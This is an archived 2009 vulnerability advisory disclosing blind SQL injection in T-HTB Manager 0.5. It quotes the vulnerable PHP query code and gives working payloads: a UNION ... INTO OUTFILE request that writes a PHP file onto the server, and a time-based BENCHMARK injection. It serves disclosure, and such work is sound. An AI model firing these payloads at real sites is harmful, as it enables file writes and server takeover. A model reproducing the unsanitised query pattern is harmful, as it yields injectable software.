Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Arbitrary File Upload vulnerability in TinyBrowser

Nullam Blog Multiple Remote Vulnerabilities

[Advisory] ChartDirector Critical File Access

[SECURITY] [DSA 1882-1] New xapian-omega packages fix cross-site scripting

From:	Salvatore "drosophila" Fresta <drosophilaxxx_(at)_gmail.com>
Date:	10.09.2009
Subject:	T-HTB Manager Mutiple Blind SQL Injection

********   Salvatore "drosophila" Fresta   ********

[+] Application: T-HTB Manager
[+] Version: 0.5
[+] Website: http://sourceforge.net/apps/mediawiki/t-htbmanager/index.php?title=Main_Page

[+] Bugs: [A] Multiple Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Sep 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


***************************************************

[+] Bugs


- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: index.php

All fields in this script are not sanitized but any
outputs aren't returned.

...

       case 'delete_category':
     $id = $_GET['id'];
     $id_interfaces = $_GET['id_interfaces'];

     if($id>0)
     {
       $query =  "SELECT rgt, lft FROM ".$table_name." WHERE id='" . $id . "'";
       $db_query = mysql_query($query);
       
...

   case 'update_category':
     $name = $_POST['name'];
     $id = $_POST['id'];

     $rate     = $_POST['rate'];
     $ceil     = $_POST['ceil'];
     $burst    = $_POST['burst'];
     $prio     = $_POST['prio'];
     $monitor  = $_POST['monitor'];

     if(strlen($name)>0 && $id>0)
     {
       $nodelft = $_POST['nodelft'];

       $lft = $_POST['lft'];
       $rgt = $_POST['rgt'];

       $query = "UPDATE ".$table_name." set name='" . $name . "' ,  lft='" . $lft . "' , rgt = '" .
$rgt . "', rate= '" . $rate . "', ceil = '" . $ceil . "', burst = '" . $burst . "', prio = '" . $prio
. "', monitor = '" . $monitor . "' WHERE id='" . $id . "'";
            
...

And many others..


***************************************************

[+] Code


- [A] Multiple Blind SQL Injection

This is a Blind SQL Injection bug but into the
database there aren't very reserved information
such as usernames and/or passwords. However this
injection can be used to write arbitrary files
on the server (when allowed).

http://site/path/index.php?action=delete_category&id=1' UNION ALL SELECT NULL,'evil code' INTO
OUTFILE '/tmp/file.php

Send it as a POST packet:

action=update_category&id=9999&name=blabla' WHERE 1=0 OR IF(ASCII(CHAR(97)) =
97,BENCHMARK(10000000000,null),null)%23


***************************************************

[+] Fix

No fix.


***************************************************